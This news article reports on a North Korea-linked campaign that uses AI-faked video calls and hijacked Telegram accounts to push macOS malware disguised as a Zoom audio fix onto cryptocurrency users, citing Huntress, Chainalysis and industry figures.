North Korean Hackers Exploit Live Video Calls
Hackers associated with North Korea have been exploiting live video calls, including those enhanced by artificial intelligence, to manipulate individuals in the cryptocurrency field, effectively tricking them into installing harmful software on their devices. Martin Kuchař, co-founder of BTC Prague, recently detailed a significant incident in which cybercriminals utilized an infiltrated Telegram account alongside a carefully orchestrated video call to distribute malware disguised as an audio fix for Zoom.
Details of the Cyber Attack
Kuchař shared this alarming information through a post on X on Thursday, revealing that this sophisticated hacking operation seems to primarily target users of Bitcoin and other digital currencies. The attackers initiate contact with potential victims and arrange meetings via platforms like Zoom or Microsoft Teams. During these calls, they deploy AI-generated visuals to impersonate familiar faces, creating an illusion of trust.
Once engaged, the attackers feign audio issues and persuade their victims to install a purported plugin to remedy the problem. However, the installed software is, in fact, malicious, granting the hackers extensive control over the victim’s system. This allows them to pilfer Bitcoin holdings, commandeer Telegram accounts, and further exploit those accounts to ensnare additional victims.
Escalating Crypto-Related Losses
The backdrop to this trend is troubling; AI-enhanced impersonation scams have prompted crypto-related losses to soar to a staggering $17 billion in 2025 alone, driven by tactics that include deepfake videos, voice imitation, and fictitious identities. Insights from Chainalysis, a blockchain analytics organization, have illustrated this alarming growth in fraudulent activities.
Previous Findings and Techniques
Kuchař’s experience echoes previous findings by Huntress, a cybersecurity firm that pointed out similar methods being employed as early as July last year. Their research showed how attackers would bait a crypto employee into a false Zoom meeting after first engaging them on Telegram, frequently utilizing deceptive meeting links that appear to come from legitimate Zoom domains. During the calls, attackers would instruct victims to download a supposed audio fix, unwittingly initiating a sequence of malicious actions through infected files.
These cons often involve the installation of an AppleScript that triggers a multi-stage infection within macOS systems. Once activated, this script erases shell history, checks for and installs Rosetta 2 on Apple Silicon Macs, and continually requests the system password to enhance its access level. The malware chain could install various harmful tools, including backdoors, keyloggers, clipboard monitoring systems, and crypto wallet theft gadgets. Kuchař reported that his compromised Telegram account was subsequently weaponized to target others in the same destructive manner.
Link to Advanced Persistent Threats
Security analysts at Huntress have confidently linked these activities to an advanced persistent threat known as TA444, also dubbed BlueNoroff, which falls under the umbrella of the Lazarus Group — a state-sponsored organization implicated in cryptocurrency theft since approximately 2017. When queried about the motivations behind these attacks, Shān Zhang, the Chief Information Security Officer at blockchain security firm Slowmist, indicated a probable connection to the larger objectives of the Lazarus Group’s ongoing campaigns.
Importance of Verification and Prevention
David Liberman, co-founder of the decentralized AI compute network Gonka, emphasized that patterns are evident across these hacking schemes, with specific wallets being targeted and nearly identical installation scripts being used consistently. He stressed the importance of verifying the authenticity of images and videos, proposing that digital content should bear cryptographic signatures from its creators, secured by multi-factor authentication to prevent these types of scams. Given the reliance on social manipulation in these attacks, understanding narratives surrounding them has become critical for detection and prevention.
